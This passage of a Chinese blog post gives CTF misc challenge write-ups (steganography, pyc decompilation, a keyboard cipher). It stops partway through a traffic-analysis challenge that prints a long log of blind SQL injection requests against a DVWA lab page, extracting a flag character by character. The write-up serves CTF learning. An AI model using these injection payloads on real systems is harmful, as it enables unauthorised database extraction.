第三届 SWCTF-Misc 所有 WP

已于 2024-05-06 21:28:49 修改
阅读量874 收藏 30
点赞数 19
分类专栏: CTF Misc 文章标签: 安全 学习 隐写 音视频 密码学 wireshark
于 2024-04-21 23:39:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/135338037
版权
CTF 同时被 2 个专栏收录
113 篇文章 18 订阅
订阅专栏
Misc
32 篇文章 7 订阅
订阅专栏

写在前面

很多是工具题,也比较综合和杂,仅以本篇博客记录自己杂项(Misc)出题的奇思妙想。

Copyright © [2024] [Myon⁶]. All rights reserved.

题目源文件地址:

https://github.com/Myon5/Myon-Miscicon-default.png?t=N7T8https://github.com/Myon5/Myon-Misc

目录

1、勇师傅送分题你们就偷着乐吧

2、柯柯柯啊

3、The Clown's Gift

4、萧总说太明显了

5、Bieber&Troye

6、Unmask The Joker

7、勇师傅的奇思妙想(加固版1)

8、勇师傅的奇思妙想(加固版2)

1、勇师傅送分题你们就偷着乐吧

这个真是送分题

739626d6bdf44600a1da1ff4fbcaaa15.png

存在文件隐藏

cd2e4854d7c84c6283bdd82d1a622065.png

直接分离后打开 flag.txt

bbc0b81575e2462c932a14a874ef9ad6.png

结尾存在 base64 编码,解码即可 

5c5a5e49391f44dc9758e8c74880d7ec.png

40674aacdecc474d8adbb13a546ceb2f.png

得到 flag:flag{swust_snert_swctf} 

2、柯柯柯啊

 题目附件为两个wav音频和一个txt文本

e15fdfac435543e2b16c10051a4c4707.png

先看txt,是很长的base64

48768b38bd544302b7e5e8273883d689.png

解码一下,很明显的看到png头

2311d3fe1e5c446eb1cfac27395f67f5.png

因此将base64转图片,使用在线网站或者工具都是可以的

这里我们直接将结果保存为png后缀

5bff00de663d4922ba58da6a9badcaef.png

查看图片,似乎看起来并不完整

fa9052e81b1546bba0331a0b739f3419.png

我们爆破一下CRC以及正确的宽和高

得到修复之后的图片

fca8ecebd6af4d42ae61e7182a4e66fd.png

打开即可得到密码:That's terrible.

目前还不知道用处,先留着后面肯定用得到。

97d9f853d390446683d57320b9db2ebd.png

接下来我们看两段音频

914b0c1936414010a1b4294a5f530da4.png

joker1的话是一段很短的杂音,joker2是一段歌曲

CTF里对音频分析常用的工具:RX-SSTV、DeepSound、Audacity

这里并没有听到无线电,因此排除 RX-SSTV

经过简单尝试可以发现:

使用Audacity打开 joker1.wav

e56d41bc342742ba831f823f3c98fa88.png

查看频谱图可以得到前半段flag:flag{1S_it_JUst_me_

1ca1879a4d894f7d8bb53e7033f01185.png

使用DeepSound打开 joker2.wav 提示需要密码,正好使用我们之前从图片上得到的密码

即:That's terrible.

bb3fa534d1ce456caf5a2becb4236355.png

输入密码后可以看到有隐藏flag2.txt

bb54f7984cab4f88b161d5a1b86d2e82.png

分离即可

e52696222d9547488280267f602eabb8.png

打开得到第二段flag:0R_is_iT_Getting_crAzier_0Utthere}

ec2e1255549c40e288f69bca538ae022.png

拼接起来,最终flag为:flag{1S_it_JUst_me_0R_is_iT_Getting_crAzier_0Utthere}

3、The Clown's Gift

 题目附件为pyc、jpg、txt文件

5d26850b4b68412b848359e5dc500a3a.png

pyc文件是看不出什么的,拿到pyc一般我们是需要转成py文件的,也就是pyc的反编译

8d5a1805c13d425bb36ab2a51c5b28f5.png

在线网站可以

https://tool.lu/pyc/

3428e83b7e5f4720b80fb51533e63db9.png

反编译后复制有用代码即可

70528b17bcc949e7adb4dda46ced52da.png

pycharm的uncompyle6也可以实现(需要安装该模块)

在终端执行如下命令

dc.pyc是源文件,dc.py是反编译生成的文件(大于符号左右都需要有空格)

uncompyle6.exe dc.pyc > dc.py

ad38cffab44c4054a14ad84c9b46f758.png

执行成功后得到dc.py

注意:这种反编译出来的py文件可能会存在一些格式问题无法直接运行

需要将代码重新复制到一个新建的py文件即可正常运行

具体参考我前面的博客:SyntaxError: Non-UTF-8 code starting with ‘\xff‘ in file but no encoding declared 解决办法与分析

http://t.csdnimg.cn/PZiIc

1bf220b415984742802cf2855ef8cc68.png

看起来像一个解密脚本:

将一个字符串按照空格分割成一个列表,并使用该列表中的元素来映射一个包含字母的二维列表(就是键盘对应的字母),最终输出对应的字母组成的字符串。

a = ''.split(' ')
key_list = [['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p'],
 [
  'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'],
 [
  'z', 'x', 'c', 'v', 'b', 'n', 'm']]
print(a)
for index in a:
    for i, key_lists in enumerate(key_list):
        for i2, key in enumerate(key_lists):
            if str(i + 1) + str(i2 + 1) == index:
                print(key, end='')

但是我们现在还没有密文,因此先放着,看其他附件

打开secret.txt,是一封写得很啰嗦的邮件

当然如果你刷题遇到过知道这个东西,这个就是垃圾邮件加密

540eb491d89543e8b9cac85124373982.png

你也可以去检索邮件内容并结合CTF等关键字

9492c304471641a8a05948a0b57b4ea6.png

你会找到一个网站:https://www.spammimic.com/

这是一个解码垃圾邮件的,我们直接解码即可

6847348f63884ac8a1fd35fa0601b62c.png

得到一串空格分隔的数字:18 15 18 22 36 19 15 21 27 19 28 13

9621c3d11e6c48a6a734d4b004dbae7c.png

结合刚才的解密脚本直接跑

将a赋值好刚才得到的数字:18 15 18 22 36 19 15 21 27 19 28 13

运行得到:itisnotajoke

应该是一个密码,留着后面用

205aff2fc4f34d5ca5864ffc8b5c95e0.png

现在附件只剩下 joker.jpg

一系列的图片分析命令使用后并没有发现什么

be24189f679f442ea326bbdf0068c142.png

使用010editor打开,拉到结尾,发现是很常见的文件尾藏信息

很显眼的 50 4B 压缩包头,只是取了倒序

ece9c6a685a8489db1222bf402928ead.png

由于jpg存在高亮,因此结束位置也很明确

我们直接提取hex值

36af4a22c3e347a5a172677160db430e.png

太长了我这里就不打出来了,从00 00 00 10 一直到结尾的 B4 05

运行上述取倒序的脚本得到 50 4B 开头的hex值

e9da678d1acc409a8336ccaa199ef666.png

新建十六进制文件

19a9a22a9b0e4a9ab57b1c0b228e382b.png

导入取倒序后的hex值,注意使用Ctrl+shift+V

2480cb0d58424c799302ab9e020ef4f5.png

因为 50 4B 是压缩包头,因此我们另存为zip文件

打开发现需要密码

df28f3ea217d4be2a8899d4fb1fb5d0c.png

使用前面得到的密码:itisnotajoke 解压

得到另一张joker的图片和一个pass.txt文档

9f95baa3c5944f708e569449145bf6aa.png

经检测发现 pass.txt 存在零宽隐写

得到 pass:"if we could be whoever we want, would the cloud love us like they hug the stars?"

应该是一串很长的密码 

97852b4bb8b24b9b88854c81ae3ef9b3.png

有一个密码,并且还有一张jpg图片,那么想到jpg的LSB隐写

(png的lsb隐写一般是不需要密码的)

1b36de1871674af19948b9c184207dbe.png

确实存在隐写

f460b04bacfd4025a4a90b989ee04f04.png

我们这里假设提取为一个txt文件(如果不是再做修改)

4cb922f49bd94f76babcb5559bb677b6.png

打开即可看到flag:

flag{Are_y0u_hav1ng_aNy_nEgative_thoUghts}

a5c180914c624a0fb7f61a306ccd0cce.png

4、萧总说太明显了

过滤 http 包,可以发现这是一段 sql 盲注的流量

10f5cec7003846599e8fe972208ae843.png

查找关键字 flag 可以找到很多关于 flag 的请求记录

ea505baa196a404a8d914281e54f7764.png

随便找一个进行 URL 解码后就可以看到它的详细查询语句

ff72a74d68e54ef2b44f7f192ed323d4.png

这里是从 swctf 数据库下的 snert 表下采用盲注的方式查 flag

901a9fb289234c2080a1efe60f91d0fc.png

通过与 ASCII 码进行比较,再结合响应包的状态码是 200 还是 404 来确定 flag 是哪些字符

提取相关请求的 URL,这里我们只需要 info 信息,不用勾选其他的

4f04aa3b73b94262961734d0a1d72ed0.png

检索 flag 定位到开始查 flag 的地方

8a65afa3679247dfb0b856063f91ece3.png

从这个包开始一直到结尾的数据全部复制下来

10dd5be7de364c70ac637880008ccc73.png

整体进行 URL 解码

c341269fce2443b2b5e6681d9487f9d8.png

将解码内容存为 txt 文件:

GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>101 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>106 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>98 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>97 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>103 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>124 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>122 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>123 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>103 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>60 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>66 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>63 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>65 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>98 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>99 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>106 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>101 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>113 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
